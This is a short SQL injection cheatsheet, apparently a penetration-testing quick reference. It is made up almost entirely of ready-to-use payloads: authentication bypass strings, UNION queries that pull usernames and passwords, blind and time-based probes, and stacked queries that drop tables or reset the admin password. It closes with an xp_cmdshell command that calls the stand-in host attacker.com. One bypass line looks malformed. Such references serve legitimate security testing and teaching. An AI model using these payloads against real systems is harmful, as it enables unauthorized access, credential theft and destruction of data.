Quick reference guides for penetration testing
# SQL Injection Cheatsheet
## Detection
- ' (single quote)
- '' (two single quotes)
- ` (backtick)
- ; (semicolon)
- -- (comment)
- # (MySQL comment)
- /* */ (multi-line comment)
## Authentication Bypass
```
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' ({)
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
```
## Union-Based
```
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password FROM users--
```
## Error-Based
```
' AND 1=CONVERT(int, (SELECT @@version))--
' AND 1=CONVERT(int, (SELECT user))--
```
## Boolean-Based Blind
```
' AND 1=1--
' AND 1=2--
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a
```
## Time-Based Blind
```
'; WAITFOR DELAY '0:0:5'--
'; IF (1=1) WAITFOR DELAY '0:0:5'--
' AND SLEEP(5)--
' AND BENCHMARK(10000000,MD5('test'))--
```
## Stacked Queries
```
'; DROP TABLE users--
'; INSERT INTO users VALUES('hacker','password')--
'; UPDATE users SET password='hacked' WHERE username='admin'--
```
## Out-of-Band
```
'; EXEC xp_cmdshell('nslookup attacker.com')--
```